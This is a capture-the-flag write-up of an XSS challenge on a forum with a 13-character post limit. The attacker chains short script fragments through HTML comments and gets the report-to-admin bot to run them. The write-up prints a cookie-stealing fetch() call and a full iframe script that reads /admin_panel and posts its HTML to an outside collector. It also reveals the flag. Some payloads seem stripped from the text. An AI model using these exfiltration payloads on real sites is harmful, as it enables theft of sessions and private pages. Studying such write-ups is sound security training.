Web task In this task, we are provided with url: https://bskweb2020.0x04.net/. This site allows is some kind of forum - it lets us create threads, and then post messages in them. We can also report the thread to admin - which is a pretty strong hint that this is a XSS challenge. Thread creation: Thread with 2 messages: Message length is very limited. There is info on main page: "Posts are strictly limited to 13 characters (and that includes HTML formatting automatically added by the editor)". Messages are sent using POST requests. Body of request is in format content=contents_of_message. The editor wraps our message in HTML

tags, so message test will be sent as


. This is something that immediately seems like a great place for XSS. And indeed, changing payload to content=. Sending those 3 messages results in expected alert. After reserving 4 characters for closing and opening comment we are left with 9 chars of js per message, which is enough to execute pretty much arbitrary code. To make my life easier, I prepared small snippet which dynamically added Now, all that's left is to find the flag. First attempt was of coure stealing admin cookies with payload such as: fetch('https://mysite.com/requestbin_endpoint/bin_id?data=' + btoa(document.cookie)). But unfortunately, admin has no cookies (or at least no cookies without httpOnly flag). Request from admin, as you can see data parameter is empty: To get the flag, we must first notice the existence of /admin_panel endpoint. There are at least 2 ways to do that: If you look at Referer header in bot's request, it points to that exact endpoint. Scan the site with tool like https://github.com/maurosoria/dirsearch, the default list can locate this url. Ok, so we probably need contents of /admin_panel. If we look at headers of response from any endpoint, we can see that X-Frame-Options header is set to SAMEORIGIN - which means we can almost surely load /admin_panel in iframe and access it's content. Payload that extracts /admin_panel and sends content to my server: function prepareFrame() { var iframe = document.createElement("iframe"); iframe.setAttribute("src", "/admin_panel"); iframe.onload = function() { console.log(iframe.contentWindow.document.documentElement.outerHTML); fetch('https://mysite.com/requestbin_endpoint/bin_id', {method: 'POST', body: btoa(iframe.contentWindow.document.documentElement.outerHTML)}); }; document.body.appendChild(iframe); } prepareFrame(); As expected, admin sent us request with pretty long payload: Decoding that base64 payload gives us html code: Uncommunicative people forum



Thread to be reviewed:

No posts.
Flag: FLAG{2bb0e8357ffff1596a8a2970ab8dbb192bee0dd6}